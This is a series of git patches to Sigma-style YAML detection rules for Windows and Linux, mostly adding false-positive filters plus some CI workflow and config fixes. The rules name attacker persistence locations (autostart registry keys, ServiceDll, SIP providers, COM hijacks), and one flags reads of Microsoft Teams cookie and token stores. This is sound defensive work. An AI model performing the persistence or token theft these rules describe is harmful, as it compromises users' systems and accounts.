'\AppData\Local\Temp\Wireshark_uninstaller.exe' # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) TargetObject|contains: '\wireshark-capture-file\' + filter_opera: + Image|startswith: + - 'C:\Program Files\Opera\' + - 'C:\Program Files (x86)\Opera\' + Image|endswith: '\installer.exe' + filter_peazip: + Image|contains: 'peazip' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|startswith: '\PeaZip.' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index 23cc3a56b..f3cb1b87c 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at' +description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2022/09/18 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.t1218 @@ -21,7 +21,11 @@ detection: TargetObject|contains: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs' - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' - condition: selection + filter: + Image: 'C:\Windows\system32\atbroker.exe' + TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' + Details: '(Empty)' + condition: selection and not filter falsepositives: - Creation of non-default, legitimate at usage level: medium diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml index 8a935e286..608a3071b 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 -modified: 2022/08/09 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -45,6 +45,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder' + filter_realvnc: + Image: 'C:\Windows\System32\spoolsv.exe' + TargetObject|endswith: '\Print\Monitors\MONVNC\Driver' + Details: 'VNCpm.dll' condition: all of system_control_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index ad5a53caa..500836df0 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/09/06 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -103,8 +103,10 @@ detection: - 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\' Details|contains: '\AppData\Local\Microsoft\OneDrive\' filter_python: - TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}' - Details|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' + TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\{' + Details|contains|all: + - '\AppData\Local\Package Cache\{' + - '}\python-' Details|endswith: '.exe" /burn.runonce' filter_officeclicktorun: Image|startswith: @@ -125,6 +127,12 @@ detection: - '"C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui' - '"C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe" /gui' - '{472083B0-C522-11CF-8763-00608CC02F24}' + filter_aurora_dashbaord: + Image|endswith: + - '\aurora-agent-64.exe' + - '\aurora-agent.exe' + TargetObject|endswith: '\Microsoft\Windows\CurrentVersion\Run\aurora-dashboard' + Details: 'C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe' condition: all of current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index 0fe1f398d..31626072c 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/08/05 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -72,6 +72,9 @@ detection: Image|endswith: '\OfficeClickToRun.exe' filter_ms_win_desktop_runtime: Details|startswith: '"C:\ProgramData\Package Cache\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\windowsdesktop-runtime-' + filter_vcredist: + Image|endswith: '\VC_redist.x64.exe' + Details|endswith: '}\VC_redist.x64.exe" /burn.runonce' condition: all of wow_current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml index 753f0d395..dce4cc2a3 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml @@ -7,7 +7,7 @@ references: - https://attack.mitre.org/techniques/T1546/015/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2022/09/02 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -79,6 +79,11 @@ detection: filter_sec_health_svc: Image: 'C:\Windows\system32\SecurityHealthService.exe' Details|contains: 'C:\Windows\System32\SecurityHealth' + filter_inprocserver: + Image: + - 'C:\Windows\System32\poqexec.exe' + - 'C:\Windows\System32\regsvr32.exe' + TargetObject|endswith: '\InProcServer32\(Default)' condition: selection and not 1 of filter* falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml index 474ba773b..5ce063496 100644 --- a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml @@ -3,7 +3,7 @@ id: 612e47e9-8a59-43a6-b404-f48683f45bd6 description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. author: frack113 date: 2022/02/04 -modified: 2022/08/10 +modified: 2022/09/20 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time @@ -22,6 +22,8 @@ detection: Image: 'C:\Windows\system32\lsass.exe' TargetObject|endswith: '\CurrentControlSet\Services\NTDS\Parameters\ServiceDll' Details: '%%systemroot%%\system32\ntdsa.dll' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' condition: selection and not 1 of filter* falsepositives: - Administrative scripts diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml index 85eb02878..3af8eef6b 100644 --- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml @@ -3,6 +3,7 @@ id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 description: Detects when an attacker register a new SIP provider for persistence and defense evasion author: Nasreddine Bencherchali date: 2022/07/21 +modified: 2022/09/21 status: experimental references: - https://persistence-info.github.io/Data/codesigning.html @@ -28,7 +29,11 @@ detection: # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll - condition: all of selection_* and not filter + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|contains: '\CryptSIPDll' + Details: 'C:\Windows\System32\PsfSip.dll' + condition: all of selection_* and not 1 of filter* falsepositives: - Legitimate SIP being registered by the OS or different software. level: medium diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml index 0f3f90a4a..691ef5e8c 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml @@ -6,19 +6,23 @@ author: Florian Roth references: - https://twitter.com/SBousseaden/status/1410545674773467140 date: 2020/07/01 -modified: 2022/03/26 +modified: 2022/09/21 logsource: category: registry_set product: windows detection: selection: - EventType: SetValue + EventType: SetValue TargetObject|contains|all: - '\Control\Print\Environments\Windows x64\Drivers' - '\Manufacturer' Details: '(Empty)' filter_cutepdf: TargetObject|contains: '\CutePDF Writer v4.0\' + filter_vnc: + TargetObject|contains: + - '\VNC Printer (PS)\' + - '\VNC Printer (UD)\' condition: selection and not 1 of filter_* falsepositives: - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index ff88c034d..245de30dc 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -19,6 +19,6 @@ detection: condition: selection falsepositives: - Legitimate administrative action -level: medium +level: medium tags: - attack.defense_evasion From 54add1516734413698adb62171258065458f38f3 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:57:33 +0200 Subject: [PATCH 87/96] workflow: fix wrong filename --- .github/workflows/sigma-test.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index 60b6cdc96..5cf624347 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -138,10 +138,10 @@ jobs: - uses: actions/checkout@v2 - name: Download evtx-sigma-checker run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker - - name: Download and extract Windows 2022 0 20348 Azure baseline + - name: Download and extract Windows 2022.0.20348 Azure baseline run: | wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz - tar xzf win2022-0-20348.tgz + tar xzf win2022-0-20348-azure.tgz - name: Remove deprecated rules run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' - name: Check for Sigma matches in baseline From f940a43d8f0ef72ee9e4c1b73291a7481f6ae9b1 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:12:30 +0200 Subject: [PATCH 88/96] workflow: use correct rule title --- .github/workflows/known-FPs.csv | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index a22dafcd5..5b36cab65 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -38,4 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe -949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon From cc5cda0a22fea3d89550c013ee7533c562465268 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 14:10:50 +0200 Subject: [PATCH 89/96] fix: needs to be contains now --- .../registry_delete_removal_com_hijacking_registry_key.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index 71184d34b..3e97012a9 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -43,7 +43,7 @@ detection: filter_peazip: Image|contains: 'peazip' # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) - TargetObject|startswith: '\PeaZip.' + TargetObject|contains: '\PeaZip.' condition: selection and not 1 of filter_* falsepositives: - Unknown From 6c70c6d35a695229c80ef418cff3c57ea21f13c9 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 22 Sep 2022 17:42:27 +0200 Subject: [PATCH 90/96] Update win_impacket_psexec.yml --- rules/windows/builtin/security/win_impacket_psexec.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index ff7856880..434d38015 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml @@ -6,7 +6,7 @@ author: Bhabesh Raj references: - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html date: 2020/12/14 -modified: 2022/08/11 +modified: 2022/09/22 logsource: product: windows service: security From 24e87d0f341e43b69a0258a12dd22f19d7740f35 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 22 Sep 2022 17:42:54 +0100 Subject: [PATCH 91/96] fix: Rename Linux process creation rule to use established pattern One rule had filename beginning 'prox' rather than 'proc'. Signed-off-by: Rachel Rice --- ...removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/process_creation/{prox_creation_lnx_chattr_immutable_removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} (100%) diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml similarity index 100% rename from rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml rename to rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml From 6497cb7745c44b523cfc367f1b533201b3ec422f Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Fri, 23 Sep 2022 03:37:00 +0900 Subject: [PATCH 92/96] Keep at level: low --- .../builtin/application/win_builtin_remove_application.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 1a497e2b6..0106730e8 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: informational +level: low tags: - attack.impact - attack.t1489 From ac9b12b6bb973bf9c2b2a72bfec3590c64692e6e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 23 Sep 2022 07:14:31 +0200 Subject: [PATCH 93/96] Update win_builtin_remove_application.yml --- .../builtin/application/win_builtin_remove_application.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 0106730e8..e9e4cc9d5 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,6 +17,7 @@ detection: condition: selection falsepositives: - Unknown +#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview level: low tags: - attack.impact From 048de3fc81cf6f6457ac46e0a189b89231440dc8 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 27 Sep 2022 10:43:38 +0900 Subject: [PATCH 94/96] add diagnosis-scripted to windows services file --- tools/config/generic/windows-services.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 01b6d3de5..9861f29c6 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -166,3 +166,8 @@ logsources: service: bits-client conditions: Channel: 'Microsoft-Windows-Bits-Client/Operational' + windows-diagnosis-scripted: + product: windows + service: diagnosis-scripted + conditions: + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file From dd1fed29a05ae7bcafdf63dfcea0ba11fedc9cbf Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 27 Sep 2022 06:36:01 +0200 Subject: [PATCH 95/96] Add shell-core service --- tools/config/generic/windows-services.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 9861f29c6..0ca38a90f 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -170,4 +170,9 @@ logsources: product: windows service: diagnosis-scripted conditions: - Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' + windows-shell-core: + product: windows + service: shell-core + conditions: + Channel: 'Microsoft-Windows-Shell-Core/Operational' From 600494adbc74f8ed6b2914f075b8c2e2e2e8ecc4 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 27 Sep 2022 13:11:08 +0500 Subject: [PATCH 96/96] Fix the filter --- ..._creation_win_teams_suspicious_command_line_cred_access.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml index 3c0eb326c..7d72377f8 100644 --- a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -7,6 +7,7 @@ references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens date: 2022/09/16 +modified: 2022/09/27 logsource: product: windows category: process_creation @@ -16,7 +17,7 @@ detection: - '\Microsoft\Teams\Cookies' - '\Microsoft\Teams\Local Storage\leveldb' filter: - Image|contains: '\Microsoft\Teams\current\Teams.exe' + Image|endswith: '\Microsoft\Teams\current\Teams.exe' condition: selection and not filter falsepositives: - Unknown